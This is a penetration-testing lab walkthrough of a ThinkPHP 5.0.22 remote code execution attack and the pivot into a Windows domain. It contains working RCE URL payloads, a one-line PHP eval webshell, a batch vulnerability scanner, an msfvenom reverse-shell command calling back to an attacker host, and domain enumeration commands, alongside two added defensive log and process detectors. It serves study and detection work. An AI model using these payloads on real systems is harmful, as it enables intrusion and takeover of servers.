Title: A simple intranet penetration shooting range combat

0x00 Introduction

The main point is the intranet penetration process itself. Although this lab does not have many hosts, the aim is mainly to practise intranet penetration.

0x01 Environment setup

Shooting Range:

win7 (internal NIC): 192.168.138.136

win7 (external NIC): 192.168.10.25

Domain host:

win2008:192.168.138.138


0x03 Web server penetration

nmap port probe

nmap -T4 -sC -sV 192.168.10.25

Here you can see several main ports, such as 80, 135, 139 and 445. The first things that come to mind as usable are IPC and SMB.

Port 80 is open, so I tried browsing to the web address. It is an old acquaintance, ThinkPHP, and still version 5.x, so there are still plenty of holes.

To determine the exact version, we first trigger an error page to reveal it. The version here turns out to be 5.0.22. If I remember correctly, there is a ThinkPHP remote command execution vulnerability for this version.

Vulnerability description: ThinkPHP supports form request forgery through the method() method of the core Request class; this function uses $_POST['_method'] to pass the real request method. Because the framework does not validate this parameter, an attacker can set $_POST['_method']='__construct' so that the member variables of this class are overwritten. By overwriting the filter variable with a function name such as system, the attacker gets arbitrary commands executed when the parameters are filtered internally.

ThinkPHP getshell

Here I first check whether Kali already has any related exploits

searchsploit thinkphp

You can see that there is a 5.x remote code execution entry here. Go directly to that folder and check the payloads listed in the txt file.

cd /usr/share/exploitdb/exploits/php/webapps

cat 46150.txt

After finding the matching version, fuzz with the following payloads. This one lists the database user name (database.username); here you can see it is root

192.168.10.25/thinkphp/public/?s=.|think\config/get&name=database.username

This payload should list the database password, but nothing is printed here

192.168.10.25/thinkphp/public/?s=.|think\config/get&name=database.password

Here phpinfo is called

192.168.10.25/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

Then check whether the current user is an administrator

192.168.10.25/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

Looking at the IP configuration, the machine has two network cards, so there is a high probability of a domain environment

192.168.10.25/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ipconfig

Looking at the process list, there is no antivirus software, so try writing a webshell without any AV evasion

192.168.10.25/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=tasklist /svc

Here I try to write a one-sentence Trojan (a one-line webshell). Because I checked earlier that there is no antivirus or SafeDog, no AV evasion is needed here.

192.168.10.25/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST[cmd]);' > connect.php

Use dir to verify whether the write succeeded

192.168.10.25/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

Connected successfully with AntSword
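From the defender's side, the request shapes used above leave a clear footprint in the web server's access log. The following is an added example, not code from the original post: a small Python detector that runs over constructed combined-format log lines (the log lines, IPs and rule names are my own assumptions) and flags the invokefunction and namespace-routing patterns, after percent-decoding the query string.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-format access log lines (not from the post's lab); the
# first three mirror the request shapes used above, the last two are benign.
SAMPLE_LOG = r"""
192.168.10.11 - - [24/Jan/2022:16:19:18 +0800] "GET /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.10.11 - - [24/Jan/2022:16:19:19 +0800] "GET /?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1 HTTP/1.1" 200 77000 "-" "Mozilla/5.0"
192.168.10.11 - - [24/Jan/2022:16:19:20 +0800] "GET /thinkphp/public/?s=.|think\config/get&name=database.username HTTP/1.1" 200 4 "-" "Mozilla/5.0"
192.168.10.40 - - [24/Jan/2022:16:19:21 +0800] "GET /index.php?s=index/user/login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.10.40 - - [24/Jan/2022:16:19:22 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 30 "-" "python-requests/2.25"
"""

# Combined log format: client, ident, user, [time], "method target proto", status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Rules run against the lower-cased, percent-decoded query string.
RULES = [
    # s= routing into the framework's own namespace (\think\... or |think\...)
    ("s-routes-into-think-namespace", re.compile(r"(^|&)s=[^&]*[\\|]think\\")),
    # the App::invokefunction -> call_user_func_array reflection chain
    ("invokefunction-with-call_user_func_array", re.compile(r"invokefunction.*call_user_func_array")),
    # a command/code execution primitive handed to that chain
    ("dangerous-callable-in-vars", re.compile(r"vars\[0\]=(system|passthru|shell_exec|exec|assert|eval|phpinfo)\b")),
]
# Note: the $_POST['_method']=__construct variant travels in the request body,
# which access logs do not record; it needs WAF or application-level logging.

def decoded_query(target):
    """Query string of a request target, percent-decoded twice (double encoding) and lower-cased."""
    query = target.split("?", 1)[1] if "?" in target else ""
    return unquote_plus(unquote_plus(query)).lower()

def scan(log_text):
    """Return one finding per flagged line: ip, timestamp, raw target and the rules that fired."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = decoded_query(m["target"])
        fired = [name for name, rx in RULES if rx.search(query)]
        if fired:
            findings.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "rules": fired})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {', '.join(f['rules'])}\n    {f['target']}")
```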

ThinkPHP batch detection

I thought about a question here. There are so many ThinkPHP versions; if Kali has no entry in its exploit database and searching on search engines is too time-consuming, is there a script to batch-detect ThinkPHP vulnerabilities?

Here I found a script for batch detection of the ThinkPHP vulnerability:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# name: thinkphp remote code detection
# description: ThinkPHP5 5.0.22/5.1.29 Remote Code Execution Vulnerability

import queue
import threading

import requests
from bs4 import BeautifulSoup


class thinkphp_rce(threading.Thread):
    def __init__(self, q):
        threading.Thread.__init__(self)
        self.q = q

    def run(self):
        while not self.q.empty():
            url = self.q.get()
            headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50'}
            # probe: a vulnerable target answers the invokefunction/phpinfo request with the phpinfo() page
            payload = r'/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1'
            vulnurl = url + payload
            try:
                response = requests.get(vulnurl, headers=headers, timeout=3, verify=False, allow_redirects=False)
                soup = BeautifulSoup(response.text, 'lxml')
                if 'PHP Version' in str(soup.text):
                    print('[+] Remote code execution vulnerability exists at the target address')
                    print('[+] Vulnerability url address ' + vulnurl)
                    # the with-block closes the file on exit; no explicit close() needed
                    with open('target.txt', 'a') as f1:
                        f1.write(vulnurl + '\n')
                else:
                    print('[-] There is no remote code execution vulnerability in the target address')
            except Exception:
                print('[!] Destination address cannot be connected')


def urlget():
    # read one target per line from url.txt, prepending http:// when no scheme is given
    urlList = []
    with open('url.txt', 'r') as f:
        for tmp in f.readlines():
            tmp = tmp.strip()
            if not tmp:
                continue
            if '//' in tmp:
                urlList.append(tmp)
            else:
                urlList.append('http://' + tmp)
    return urlList


if __name__ == '__main__':
    print('''
    *Made by :tdcoming
    *For More :https://t.zsxq.com/Ai2rj6E
    *MY Heart :https://t.zsxq.com/A2FQFMN
    ''')
    urlList = urlget()
    threads = []
    threads_count = 10
    q = queue.Queue()
    for url in urlList:
        q.put(url)
    for i in range(threads_count):
        threads.append(thinkphp_rce(q))
    for i in threads:
        i.start()
    for i in threads:
        i.join()

Usage is very simple: put the targets to be checked in url.txt; if a vulnerable address is found, a target.txt file is generated automatically and the address is saved in it.

0x04 Intranet information collection

Here we use AntSword's command window to collect information about the machine: administrator permission plus dual network cards

whoami
ipconfig

Check the domain-related information

net view
net config workstation
net user /domain

0x05 Intranet penetration

Getting MSF online

Generate abc.exe with msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f exe > abc.exe

Upload it to the target machine using AntSword

Because there is no antivirus here, no AV evasion is needed; just run it from the command line.

Start the listener in msf and the session comes online

Information Collection

Use getsystem to escalate privileges to SYSTEM. Because this is a shooting range, getsystem succeeds easily.

After escalating privileges, get a Windows shell to continue collecting domain information.

chcp 65001
net user /domain
net group "domain computers" /domain
net group "domain controllers" /domain
net group "domain admins" /domain

The target machine is in a domain named "sun", and there is only one domain controller. Here I ping the domain controller directly and get its IP: 192.168.138.138
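The host and domain enumeration run from the AntSword command window in 0x04 and from the meterpreter shell just above is exactly what endpoint telemetry catches on the defender's side. Added example, not from the original post: it analyses constructed Sysmon-style process-creation events (host name, paths, timestamps and rule names are my assumptions) for a web server process spawning cmd.exe, domain group/user enumeration, and bursts of recon commands on one host.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events in a simplified Sysmon Event ID 1 shape (not real telemetry).
# Paths and the host name are assumptions; the commands mirror the recon steps in the post.
SAMPLE_EVENTS = [
    {"t": "2022-01-24T16:19:22", "host": "WIN7-WEB", "parent": r"C:\web\Apache\bin\httpd.exe", "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c whoami"},
    {"t": "2022-01-24T16:19:23", "host": "WIN7-WEB", "parent": r"C:\web\Apache\bin\httpd.exe", "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c ipconfig"},
    {"t": "2022-01-24T16:19:40", "host": "WIN7-WEB", "parent": r"C:\web\Apache\bin\httpd.exe", "image": r"C:\Windows\System32\cmd.exe", "cmd": 'cmd.exe /c net group "domain admins" /domain'},
    {"t": "2022-01-24T16:25:00", "host": "WIN7-WEB", "parent": r"C:\Users\admin\Desktop\abc.exe", "image": r"C:\Windows\System32\cmd.exe", "cmd": 'cmd.exe /c net group "domain controllers" /domain'},
    {"t": "2022-01-24T17:00:00", "host": "WIN7-WEB", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c ipconfig"},
]

WEB_PARENTS = {"httpd.exe", "php-cgi.exe", "php.exe", "w3wp.exe", "nginx.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
RECON_RE = re.compile(r"\b(whoami|ipconfig|tasklist|net view|net config|net user|net group|ping)\b")
DOMAIN_ENUM_RE = re.compile(r"\bnet (group|user)\b.*\s/domain\b")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def analyze(events, window=timedelta(minutes=10), burst=3):
    """Return (rule, host, detail) tuples for the three behaviours worth alerting on."""
    findings, recon_times = [], {}
    for e in events:
        cmd = e["cmd"].lower()
        # 1. a web server worker spawning an interactive shell is the classic webshell signature
        if basename(e["parent"]) in WEB_PARENTS and basename(e["image"]) in SHELLS:
            findings.append(("web-server-spawned-shell", e["host"], e["cmd"]))
        # 2. domain group/user enumeration from any parent; the parent path is kept for triage
        if DOMAIN_ENUM_RE.search(cmd):
            findings.append(("domain-enumeration", e["host"], f'{e["cmd"]} (parent {e["parent"]})'))
        # 3. collect recon commands per host for the burst rule below
        if RECON_RE.search(cmd):
            recon_times.setdefault(e["host"], []).append(datetime.fromisoformat(e["t"]))
    for host, times in recon_times.items():
        times.sort()
        for i, start in enumerate(times):
            n = sum(1 for t in times[i:] if t - start <= window)
            if n >= burst:  # report the first window that reaches the threshold, once per host
                findings.append(("recon-burst", host, f"{n} recon commands within {window} from {start}"))
                break
    return findings

if __name__ == "__main__":
    for rule, host, detail in analyze(SAMPLE_EVENTS):
        print(f"[{rule}] {host}: {detail}")
```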

Get credentials

Because there are two network segments, add the route first to make the following operations easier

# msf operations
route add 192.168.138.0 255.255.255.0 2
route print

# session operations
run autoroute -s 192.168.138.0/24
run autoroute -p
